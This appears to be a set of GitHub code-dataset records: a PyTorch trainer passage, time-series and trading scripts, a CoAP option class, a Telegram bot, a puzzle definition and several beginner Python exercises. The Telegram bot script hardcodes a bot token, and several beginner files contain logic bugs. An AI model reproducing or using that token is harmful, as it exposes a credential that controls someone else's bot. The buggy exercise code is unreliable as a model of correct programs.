MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n self.eval_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n \n @abstractmethod\n def _train_epoch(self):\n \"\"\"\n Training logic for an epoch. Only takes care of doing a single training loop.\n\n :return: A dict that contains average loss and metric(s) information in this epoch.\n \"\"\"\n raise NotImplementedError\n\n def train(self):\n \"\"\"\n Full training logic\n \"\"\"\n\n self.not_improved_count = 0\n prev_metric_value = 999999999999999 if self.monitor_mode == \"min\" else 0 \n if self.wandb_enabled: wandb.watch(self.model, self.criterion, log='all')\n states = {\"loss2d\": {\"train\": [], \"val\": []}, \"loss3d\": {\"train\": [], \"val\": []}}\n for epoch in range(self.start_epoch, self.epochs + 1):\n \n if epoch % self.curriculum[\"duration\"] == 0:\n \n self.future_window += self.curriculum[\"step\"]\n self.history_window += self.curriculum[\"step\"]\n \n if self.history_window > self.max_history_window:\n self.history_window = self.max_history_window\n \n if self.future_window > self.max_future_window:\n self.future_window = self.max_future_window\n \n self.logger.info(f\"Setting curriculum to history window: {self.history_window}, future window: {self.future_window}\") \n\n \n self.current_epoch = epoch\n train_result = self._train_epoch()\n states[\"loss2d\"][\"train\"].append(train_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"train\"].append(train_result[\"loss3d\"])\n # save logged informations into log dict\n log = {'epoch': self.current_epoch}\n log.update(train_result)\n\n if self._do_evaluate():\n eval_result = self.evaluate(history_window=self.history_window, future_window=self.future_window)\n states[\"loss2d\"][\"val\"].append(eval_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"val\"].append(eval_result[\"loss3d\"])\n # save eval information to the log dict as well\n log.update({f'eval_{key}': value for key, value in eval_result.items()})\n if self.wandb_enabled:\n self.wandb.log(log)\n\n\n\n if self.monitor_mode != 'off' : # Then there is a metric to monitor\n if self.monitor_metric in log: # Then we have measured it in this epoch\n\n \n metric_value = log[self.monitor_metric]\n if self.monitor_mode == \"min\" and metric_value < prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path)\n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n\n elif self.monitor_mode == \"max\" and metric_value > prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path) \n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n \n else:\n if self.early_stop:\n self.not_improved_count += 1\n if self.not_improved_count == self.early_stop:\n self.logger.info(f\"No improvement so far... breaking...goodby\")\n break\n self.logger.info(f\"Patience running out... {self.not_improved_count}\") \n\n\n else:\n ## The metric wasn't measured in this epoch. Don't change not_impoved_count or similar things here!!!\n self.logger.warning(f\"Warning: At epoch {self.current_epoch} Metric '{self.monitor_metric}' wasn't measured. 
Not monitoring it for this epoch.\")\n \n # print logged information to the screen\n for key, value in log.items():\n self.logger.info(' {:15s}: {}'.format(str(key), value))\n\n if self.wandb_enabled: wandb.log(log)\n\n if self.current_epoch % self.save_period == 0:\n # Just to regularly save the model every save_period epochs\n path = os.path.join(self.checkpoint_dir, f'per_epoch_model.pth')\n self.save_model(path=path)\n if self._do_evaluate():\n # step plateau-style schedulers only in epochs where eval_result was actually computed\n self.lr_scheduler.step(eval_result[\"loss2d\"])\n # Always save the last model\n path = os.path.join(self.checkpoint_dir, f'last_model.pth')\n self.save_model(path=path)\n return states\n\n def _do_evaluate(self):\n \"\"\"\n Based on the self.current_epoch and self.eval_interval, determine if we should evaluate.\n You can take hint from saving logic implemented in BaseTrainer.train() method\n\n returns a Boolean\n \"\"\"\n if self.current_epoch % self.eval_period == 0:\n return True\n else:\n return False\n \n @abstractmethod\n def evaluate(self, loader=None):\n \"\"\"\n Evaluate the model on the val_loader given at initialization\n\n :param loader: A Dataloader to be used for evaluation. If not given, it will use the \n self._eval_loader that's set during initialization..\n :return: A dict that contains metric(s) information for validation set\n \"\"\"\n raise NotImplementedError\n \n def save_model(self, path=None):\n \"\"\"\n Saves only the model parameters.\n : param path: path to save model (including filename.)\n \"\"\"\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n torch.save(self.model.state_dict(), path)\n self.logger.info(\"Checkpoint saved.\")\n\n def load_model(self, path=None):\n \"\"\"\n Loads model params from the given path.\n : param path: path to load model from (including filename.)\n \"\"\"\n self.logger.info(\"Loading checkpoint: {} ...\".format(path))\n self.model.load_state_dict(torch.load(path))\n self.logger.info(\"Checkpoint loaded.\")\n\n\n def save_checkpoint(self, path=None):\n \"\"\"\n Saving TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: path to save the checkpoint to (including filename.)\n \"\"\"\n arch = type(self.model).__name__\n state = {\n 'arch': arch,\n 'epoch': self.current_epoch,\n 'model': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'lr_scheduler': self.lr_scheduler.state_dict(),\n 'monitor_best': self.monitor_best,\n 'config': self.config\n }\n torch.save(state, path)\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n\n\n def resume_checkpoint(self, resume_path=None):\n \"\"\"\n Loads TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: Checkpoint path to be resumed\n \"\"\"\n resume_path = str(resume_path)\n self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n checkpoint = torch.load(resume_path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.monitor_best = checkpoint['monitor_best']\n\n # load architecture params from checkpoint.\n if checkpoint['config']['arch'] != self.config['arch']:\n self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n \"checkpoint. 
This may yield an exception while state_dict is being loaded.\")\n missing_keys, unexpected_keys = self.model.load_state_dict(checkpoint['model'], strict=False)\n if len(missing_keys) > 0:\n self.logger.warning(f\"[WARNING] missing keys: {missing_keys}\")\n if len(unexpected_keys) > 0:\n self.logger.warning(f\"[WARNING] unexpected keys: {unexpected_keys}\")\n\n # load optimizer state from checkpoint only when optimizer type is not changed.\n if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n \"Optimizer parameters not being resumed.\")\n else:\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n # load lr_scheduler state from checkpoint only when lr_scheduler type is not changed.\n if checkpoint['config']['lr_scheduler']['type'] != self.config['lr_scheduler']['type']:\n self.logger.warning(\"Warning: lr_scheduler type given in config file is different from that of checkpoint. \"\n \"lr_scheduler parameters not being resumed.\")\n else:\n self.lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n self.logger.info(\"Checkpoint loaded. Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"mohammadasim98/human-pose-prediction-in-the-wild","sub_path":"src/trainers/base3d.py","file_name":"base3d.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
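BaseTrainer.train() above combines metric monitoring with patience-based early stopping. Its control flow reduced to a skeleton (function and toy values invented):

```python
# Skeleton of the monitor / early-stopping loop ('min' mode: lower is better).
from math import inf

def run(metric_per_epoch, mode='min', patience=3):
    best, stale = (inf if mode == 'min' else -inf), 0
    for epoch, value in enumerate(metric_per_epoch, start=1):
        improved = value < best if mode == 'min' else value > best
        if improved:
            best, stale = value, 0       # trainer would save best_model.pth here
        else:
            stale += 1
            if stale >= patience:        # early stop
                return epoch, best
    return len(metric_per_epoch), best

print(run([0.9, 0.7, 0.8, 0.8, 0.8]))    # (5, 0.7): three stale epochs in a row
```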
+{"seq_id":"2602029529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import poly\nfrom sympy.abc import B, a, b, c, d\nfrom scipy.optimize import minimize, basinhopping, brute, least_squares\n\nfrom sarima_plus_plus import sampleSeasonalARIMA, calculateSeasonalARIMA_error, \\\n calculateSeasonalARIMA_error_minimization_form_slow, \\\n SARIMA_error_squared, difference_series\n\nif __name__ == '__main__':\n p_poly = None\n q_poly = poly(1 - a * B, B) * poly(1 - b * B ** 4, B) * poly(1 - c * B ** 30, B)\n d_poly = poly(1 - B, B)\n\n q_symbols = [a, b, c]\n q_ARIMA_coeffs = [0.6, 0.2, 0.1]\n est_p_poly = None\n est_q_poly: poly = poly(q_poly.subs(dict(zip(q_symbols, q_ARIMA_coeffs))), B)\n\n y_t = sampleSeasonalARIMA(est_p_poly, d_poly, est_q_poly, 1, 1000)\n plt.plot(y_t, label=\"sampled ARIMA\", marker='x')\n\n a_t_error = calculateSeasonalARIMA_error(y_t, est_p_poly, d_poly, est_q_poly)\n plt.plot(a_t_error, label='sampled ARIMA error', marker='.', markevery=10)\n\n print(\"est_q_poly\", est_q_poly)\n print(\"Expected value of shock a_t\", np.mean(a_t_error))\n print(\"sd of shock a_t\", np.sqrt(np.var(a_t_error)))\n # remember: don't square error to determine the sd of a_t\n\n plt.legend()\n plt.show()\n ###################################################################\n\n myx0 = np.random.random(len(q_ARIMA_coeffs))\n myx0 /= np.sum(myx0)\n\n w_t = difference_series(y_t, d_poly)\n\n res = minimize(SARIMA_error_squared, x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n method='Nelder-Mead', options={'maxiter': 5000, 'disp': True})\n print(\"estimated params (via minimize):\", res.df)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n\n # warn: lm method does not allow bounds, therefore good initial guess is needed (?) (i.e. satisfying conditions like inveritibility)\n res = least_squares(calculateSeasonalARIMA_error_minimization_form_slow, bounds=(-2, 2), x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n )\n print(\"estimated params (via least_squares):\", res.x)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n","repo_name":"Irfan-Mu3/ai-ds-projects","sub_path":"time_series_analysis/time_series_funcs/spp_MA_test.py","file_name":"spp_MA_test.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39314756962","text":"# input\nname = str(input(\"Enter last name: \"))\ndependents = int(input(\"Enter the number of dependents: \"))\ngrossIncome = float(input(\"Enter gross income: $\"))\nagi = grossIncome-dependents*12000\n\n# process phase\nif agi > 50000:\n itr = 0.20\nelse:\n itr = 0.10\nincomeTax = agi*itr\nif incomeTax < 0:\n incomeTax = 100\n\n# output\nprint(name)\nprint(\"Gross income: $\", grossIncome)\nprint(\"Number of dependents: \", dependents)\nprint(\"Adjusted gross income: $\", agi)\nprint(\"Income tax: \", incomeTax)","repo_name":"katieserg/CIS106-Katie-Sergiyenko","sub_path":"PS3P5.py","file_name":"PS3P5.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12486999604","text":"import sys\nread = sys.stdin.readline\n\nn = int(read())\n\nif n <= 2 :\n print(n)\n exit()\n\ndp1 = [0, 1]\ndp2 = [1, 1]\n\nfor i in range(2, n) :\n c = []\n c.append(dp2[1]%15746)\n c.append((dp1[1]+dp2[1]%15746))\n #print(c)\n dp1 = dp2\n dp2 = c\n\nprint(sum(c)%15746)\n","repo_name":"HyunJungJo98/Algorithm-Study","sub_path":"DP/1904 - 01타일.py","file_name":"1904 - 01타일.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9655189","text":"from coapthon import defines\nfrom coapthon.utils import byte_len\n\n__author__ = 'Giacomo Tanganelli'\n\n\nclass Option(object):\n \"\"\"\n Class to handle the CoAP Options.\n \"\"\"\n def __init__(self):\n \"\"\"\n Data structure to store options.\n \"\"\"\n self._number = None\n self._value = None\n\n @property\n def number(self):\n \"\"\"\n Return the number of the option.\n\n :return: the option number\n \"\"\"\n return self._number\n\n @number.setter\n def number(self, value):\n \"\"\"\n Set the option number.\n\n :type value: int\n :param value: the option number\n \"\"\"\n self._number = value\n\n @property\n def value(self):\n \"\"\"\n Return the option value.\n\n :return: the option value in the correct format depending on the option\n \"\"\"\n if type(self._value) is None:\n self._value = bytearray()\n opt_type = defines.OptionRegistry.LIST[self._number].value_type\n if opt_type == defines.INTEGER:\n if byte_len(self._value) > 0:\n return int(self._value)\n else:\n return defines.OptionRegistry.LIST[self._number].default\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"\n Set the value of the option.\n\n :param value: the option value\n \"\"\"\n if type(value) is str:\n value = bytearray(value, \"utf-8\")\n elif type(value) is int and byte_len(value) != 0:\n value = value\n elif type(value) is int and byte_len(value) == 0:\n value = 0\n self._value = value\n\n @property\n def length(self):\n \"\"\"\n Return the value length\n\n :rtype : int\n \"\"\"\n if isinstance(self._value, int):\n return byte_len(self._value)\n if self._value is None:\n return 0\n return len(self._value)\n\n def is_safe(self):\n \"\"\"\n Check if the option is safe.\n\n :rtype : bool\n :return: True, if option is safe\n \"\"\"\n if self._number == defines.OptionRegistry.URI_HOST.number \\\n or self._number == defines.OptionRegistry.URI_PORT.number \\\n or self._number == defines.OptionRegistry.URI_PATH.number \\\n or self._number == defines.OptionRegistry.MAX_AGE.number \\\n or self._number == defines.OptionRegistry.URI_QUERY.number \\\n or self._number == defines.OptionRegistry.PROXY_URI.number \\\n or self._number == defines.OptionRegistry.PROXY_SCHEME.number:\n return False\n return True\n\n @property\n def name(self):\n \"\"\"\n Return option name.\n\n :rtype : String\n :return: the option name\n \"\"\"\n return defines.OptionRegistry.LIST[self._number].name\n\n def __str__(self):\n \"\"\"\n Return a string representing the option\n\n :rtype : String\n :return: a message with the option name and the value\n \"\"\"\n return self.name + \": \" + str(self.value) + \"\\n\"\n\n def __eq__(self, other):\n \"\"\"\n Return True if two option are equal\n\n :type other: Option\n :param other: the option to be compared against\n :rtype : Boolean\n :return: True, if option are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/messages/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"}
+{"seq_id":"43360385154","text":"\n#This program calculate the numbers of students with while loop\n\n#the main function\ndef main():\n endProgram, totalScore, averageScores, score, number, counter = declareVariable()\n\n while endProgram == \"no\":\n declareVariable()\n number = getNumber()\n totalScore = getScores(number,totalScore)\n averageScores = getAverage(totalScore, number)\n printAverage(averageScores)\n endProgram = input(\"Do you want to end the program?(Enter no to process a new set of test score)\")\n\ndef declareVariable():\n endProgram = \"no\"\n totalScore = 0.0\n averageScores = 0.0\n score = 0\n number = 0\n counter = 1\n return endProgram, totalScore, averageScores, score, number, counter\n\ndef getNumber():\n number = int(input(\"How many students took the test\"))\n return number\n\ndef getScores(number,totalScore):\n counter = 1\n while counter <= number:\n score = int(input(\"Enter the score\"))\n totalScore += score\n counter += 1\n return totalScore\n\ndef getAverage(totalScore, number):\n averageScore = totalScore/number\n return averageScore\n\ndef printAverage(averageScores):\n print(\"The average Score is \", averageScores)\n#calls main\nmain()\n","repo_name":"ssd2192/Python","sub_path":"Total Students with While Loop.py","file_name":"Total Students with While Loop.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31744889754","text":"# Write a program that asks the user to enter an integer and prints two integers, root\n# and pwr, such that 0 < pwr < 6 and root**pwr is equal to the integer entered by the user. If no\n# such pair of integers exists, it should print a message to that effect.\n\n\nimport math\n\n\n\nnum = int(input(\"Enter an integer: \"))\nfound = False\n\n#set 0 < power < 6\nfor pwr in range(1,6):\n #found root with built func math.sqrt\n #root = round(num**(1/pwr))\n root = math.sqrt(num)\n #compare if root**power == num entered\n if root**pwr == num:\n found = True\n #if True print(root, power)\n print(f\"root = {root} and power = {pwr}\")\n print(f\"{root}^{pwr} = {num}\")\n\nif not found:\n print(\"No such pair of integers exists.\")\n\n###WHILE LOOP VERSION\n\n# num = int(input(\"Enter an integer: \"))\n# found = False\n# pwr = 2\n\n# while pwr < 6:\n# root = round(num**(1/pwr))\n# if root**pwr == num:\n# found = True\n# print(f\"{root}^{pwr} = {num}\")\n# pwr += 1\n\n# if not found:\n# print(\"No such pair of integers exists.\")\n\n\n","repo_name":"ShadrackAdom/Data-Science-SelfTaught-Learning-Path","sub_path":"OSSU/MIT-Intro-to-CS-Python/FingerExercise/rootpwr.py","file_name":"rootpwr.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21338834568","text":"from __future__ import unicode_literals\nimport youtube_dl\n\"\"\"\n# 仅下载视频\ntimes = int(input('输入要下载视频的数量:'))\nfor i in range(times):\n ydl_opts = {}\n ys_url = input(f'要下载{i+1}次的视频地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([ys_url])\n\"\"\"\n\n# 仅下载视频的音频\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ntimes = int(input('输入要下载音频的数量:'))\nfor i in range(times):\n y_url = input(f'要下载{i+1}次音频的视频的地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([y_url])\n","repo_name":"getcoden/python-practise","sub_path":"10 有趣的脚本小程序/Download视频及youtube视频中仅下载音频.py","file_name":"Download视频及youtube视频中仅下载音频.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23427646474","text":"from telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters, ConversationHandler\n\n\ndef start(updater: Update, context: CallbackContext): # Hardoyim bulish sharit\n updater.message.reply_text(\"Assalomu alakum \\n\\nIsmingizni kirting: ✍️\") # BU botga malumotni pirosta ekranga chiqarish\n # updater.message.text # Botga xabar junatsa qabul qiladi yani ushlob olish uchun\n return 2\n\n\ndef name(updater: Update, context: CallbackContext):\n name_my = updater.message.text\n updater.message.reply_text(\"Familiyangizni kiriting: ✍️\")\n\n return 3\n\n\ndef fname(updater: Update, context: CallbackContext):\n fname_my = updater.message.text\n updater.message.reply_text(\"Yoshingizni kiriting ✍️\")\n\n return 4\n\ndef danni(updater: Update, context: CallbackContext):\n danni_my = updater.message.text\n updater.message.reply_text(f\"Quyidagi ma'lumotlar tog'rimi?\\nISM:{start}\\nFAMILIYA:{name}\\nYOSH:{fname}\")\n return 5\n\ndef age(updater: Update, context: CallbackContext):\n go_to = [ # kinobka uchun uzgaruvchi\n [KeyboardButton(\"⬅️Oldinga\")]\n # KeyboardButton KInobka chiqarish () buni ichiga yozilgan malumot Knobkani ichiga yozlib qoladi\n ]\n # ReplyKeyboardMarkup -- BU kinobka uzgaruvchisini chaqirib beradi\n # resize_keyboard = True -- Kinobka razmer ni kechkena qilib beradi\n updater.message.reply_text(\"Keyingi bo'limga o'tilsinmi?\",\n reply_markup=ReplyKeyboardMarkup(go_to, resize_keyboard=True))\n age_my = updater.message.text\n\n return 6\n\n\ndef menu(updater: Update, context: CallbackContext):\n info_button = [\n [KeyboardButton(\"🍴 Menyu\")],\n [KeyboardButton(\"🛍 Mening buyurtmalarim\")],\n [KeyboardButton(\"✍️ Fikr bildirish\"), KeyboardButton(\"⚙️ Sozlamalar\")]\n ]\n updater.message.reply_text(\"Quydagilardan birini tanlang..\",\n reply_markup=ReplyKeyboardMarkup(info_button, resize_keyboard=True))\n\n return 1\n\n\ndef post_message(updater: Update, context: CallbackContext):\n button_end = [\n [KeyboardButton(\"⬅️ Ortga\")]\n ]\n msg = updater.message.text\n updater.message.reply_text(f\"{msg} buyrug'i bosildi\", reply_markup=ReplyKeyboardMarkup(button_end, resize_keyboard=True))\n\n return 7\n\n # return 2\n # updater.message.reply_text(f\"{msg} bo'limiga\")\n\n\ndef main():\n TOKENT = \"5132329633:AAGFHeFtlyJR4iHeWID7D7CloKzx4xO3AOQ\"\n\n updater = Updater(TOKENT)\n\n all_handler = ConversationHandler(\n entry_points=[CommandHandler(\"start\", start)],\n states={\n 1: [MessageHandler(Filters.text, post_message)],\n 2: [MessageHandler(Filters.text, name)],\n 3: [MessageHandler(Filters.text, fname)],\n 4: [MessageHandler(Filters.text, age)],\n 5: [MessageHandler(Filters.text, menu)], # bu def ni bajarish tartibi\n\n },\n fallbacks=[]\n )\n updater.dispatcher.add_handler(all_handler)\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"richkhandev/rasm.jpg","sub_path":"Bot_3.py","file_name":"Bot_3.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74058576090","text":"from puzzler.puzzles import polyominoes\nfrom puzzler.puzzles.polyominoes import (\n Polyominoes123456, OneSidedPolyominoes123456)\n\n\nclass Polyominoes123456Star(Polyominoes123456):\n\n \"\"\"\n Monomono, domino, & triominoes restricted to a central 3x3 square.\n\n Pentominoes & tetrominoes restricted to the middle ring, as per\n Polyominoes12345Diamond2.\n\n Hexominoes restricted to an outer ring.\n\n 4,579 unique solutions for the pentominoes & tetrominoes (outer ring).\n 6 unique solutions for the inner square.\n 8 relative orientations.\n Total unique solutions: 219,792.\n\n many solutions\n\n Design by `Jack Wetterer and Chris Patterson, with symmetry refinements by\n Darian Jenkins `__, extending Kadon's\n 'Poly-5' (gamepuzzles.com/polycub2.htm#P5).\n \"\"\"\n\n width = 27\n height = 29\n\n def coordinates(self):\n self.inner_square_coords = set(\n self.coordinates_rectangle(3, 3, offset=(12,13)))\n coords_5 = set(\n list(self.coordinates_diamond(7, offset=(7,8)))\n + list(self.coordinates_rectangle(15, 1, offset=(6, 14)))\n + list(self.coordinates_rectangle(1, 15, offset=(13, 7))))\n self.middle_ring_coords = coords_5 - set(self.inner_square_coords)\n coords_6 = set(\n list(self.coordinates_rectangle(27, 1, offset=(0, 14)))\n + list(self.coordinates_rectangle(1, 29, offset=(13, 0))))\n for i in range(6):\n coords_6.update(set(self.coordinates_rectangle(\n 23 - 4 * i, 3 + 4 * i, offset=(2 * i + 2, 13 - 2 * i))))\n self.outer_ring_coords = coords_6 - coords_5\n return sorted(coords_6)\n\n def customize_piece_data(self):\n self.piece_data['P06'][-1]['rotations'] = None\n self.piece_data['P06'][-1]['flips'] = None\n\n fixed_inner_pieces = True\n\n if fixed_inner_pieces:\n\n restrictions = {\n #name: [(aspect, offset), ...],\n 'O1': [(0, (13, 14))],\n 'I2': [(1, (13, 15))],\n 'I3': [(0, (12, 13))],\n 'V3': [(2, (13, 13))],\n 'I4': [(1, ( 6, 14))],\n 'L4': [(1, (13, 7))],\n 'O4': [(0, (16, 12))],\n 'T4': [(2, (11, 17))],\n 'Z4': [(1, ( 9, 16))],\n 'F': [(5, (11, 9))],\n 'I': [(0, (13, 17))],\n 'L': [(3, (11, 15))],\n 'N': [(6, ( 8, 14))],\n 'P': [(0, (14, 17))],\n 'T': [(0, (18, 13))],\n 'U': [(1, (15, 14))],\n 'V': [(3, (12, 10))],\n 'W': [(3, ( 8, 11))],\n 'X': [(0, (15, 15,))],\n 'Y': [(0, (15, 10))],\n 'Z': [(3, (10, 11))],\n }\n\n def build_matrix(self):\n self.build_restricted_matrix()\n\n else:\n\n def build_matrix(self):\n self.build_regular_matrix(\n (polyominoes.Monomino.piece_data.keys()\n + polyominoes.Domino.piece_data.keys()\n + sorted(polyominoes.Trominoes.piece_data.keys())),\n sorted(self.inner_square_coords))\n self.build_regular_matrix(\n (sorted(polyominoes.Tetrominoes.piece_data.keys())\n + sorted(polyominoes.Pentominoes.piece_data.keys())),\n sorted(self.middle_ring_coords))\n self.build_regular_matrix(\n sorted(polyominoes.Hexominoes.piece_data.keys()),\n sorted(self.outer_ring_coords))\n\n\nclass Polyominoes123456_23x13(Polyominoes123456):\n\n width = 23\n height = 13\n","repo_name":"bpasanek/puzzlecode","sub_path":"puzzler-tweaked/puzzler/puzzles/polyominoes123456.py","file_name":"polyominoes123456.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"40065589768","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndef load_data(file_name):\n df = pd.read_csv(file_name)\n return df\n\ndef buy_n_sell(true_prices, pred_prices, balance=1000000):\n\n num_share = 0\n portfolio_values = list()\n\n long_pos = 1 # 1 long ; 0 short\n long_price = true_prices[0] # assume holding the stock at the beginning\n\n profits = list() # daily profit\n\n num_share = balance//long_price\n balance = balance-num_share*long_price\n\n for i in range(len(pred_prices)-1):\n if i == len(pred_prices)-2 and long_pos == 1:\n if pred_prices[i+1] >= true_prices[i]:\n profits.append(true_prices[i+1]-long_price) # sell on last day\n long_pos = 0\n balance = balance + true_prices[i + 1] * num_share\n portfolio_values.append(balance) # 2nd last day\n portfolio_values.append(balance) # last day\n num_share = 0\n break\n else: # i == len(pred_prices)-2 and pred_prices[i+1] < true_prices[i] and long_pos == 1:\n profits.append(true_prices[i]-long_price) # sell on the 2nd last day\n long_pos = 0\n balance = balance + num_share*true_prices[i]\n portfolio_values.append(balance)\n portfolio_values.append(balance)\n num_share = 0\n break\n if high_return(true_prices[i], pred_prices[i+1]) and long_pos == 0:\n long_pos = 1\n profits.append(0)\n long_price = true_prices[i]\n portfolio_values.append(balance)\n num_share = balance//long_price\n balance = balance-num_share*long_price\n elif high_return(true_prices[i], pred_prices[i+1]) != True and long_pos == 1:\n long_pos = 0\n profits.append(true_prices[i]-long_price)\n balance = balance + num_share*true_prices[i]\n num_share = 0\n portfolio_values.append(balance)\n elif low_return(true_prices[i], pred_prices[i+1]) and long_pos == 1:\n long_pos = 0\n balance += num_share*true_prices[i]\n portfolio_values.append(balance)\n num_share=0\n else:\n profits.append(0)\n portfolio_values.append(balance+num_share*true_prices[i])\n continue\n return portfolio_values\n\n\n\ndef high_return(true_price, pred_price):\n return pred_price >= true_price * 1.02 > 0 # if predicted price is 2% higher than current price\n\n\ndef low_return(true_price, pred_price):\n return true_price * 0.99 >= pred_price > 0\n\n\nfile_name = 'return_df.csv'\ndf = load_data(file_name)\n\ntrue_prices, pred_prices = df['true_prices'], df['pred_prices']\nbalance = 1000000\nportfolio_values = buy_n_sell(true_prices, pred_prices,balance)\nportfolio_values = [elem/balance for elem in portfolio_values]\ntrue_pct_change = [x/true_prices[0] for x in true_prices]\n\n# plotting\nplt.plot(true_pct_change, label=\"buy and hold\")\nplt.plot(portfolio_values, label='strategy')\nplt.legend()\nplt.show()\n\ntrue_returns = np.diff(true_prices)\npred_returns = np.diff(pred_prices)\nax= plt.figure()\nplt.plot(true_returns, label='true')\nplt.plot(pred_returns, label='predicted')\nplt.show()","repo_name":"ysong126/previous_repo","sub_path":"Time series LSTM/strategy_backtest.py","file_name":"strategy_backtest.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13402656694","text":"#Task 9_1\nn=0\nnl=0\nf=0\nwhile n<1 or n>100000:\n n=int(input())\nwhile nl>n or nl<1 or f==1:\n f=0\n print(f\"Vvedite cherz probel {n} chisel.\")\n l=list(map(int,input().split()))\n nl=len(l)\n l.sort()\n if len(l) > 0:\n if l[-1] > 2*10e9 or l[0] < -2*10e9:\n f=1\ntl = set(l)\nprint(len(tl))\n\n##Task 9_2\ntmp1 = set()\ntmp2 = set()\ntmp3 = set()\nprint(f\"Vvedite kol-vo tmp1 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp1\")\nfor i in range(n):\n tmp1.add(int(input()))\nprint(f\"Vvedite kol-vo tmp2 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp2\")\nfor i in range(n):\n tmp2.add(int(input()))\ntmp3=tmp2.intersection(tmp1)\nprint(len(tmp3))\n\n##Task 9_3\ntmp=set()\nl=list(map(int,input().split()))\nfor i in l:\n if i in tmp:\n print(f\"{i} YES\")\n else:\n print(f\"{i} NO\")\n tmp.add(i)","repo_name":"IgorKirilyuk/Python1","sub_path":"PythonApplication1/PythonApplication1/lesson_9.py","file_name":"lesson_9.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
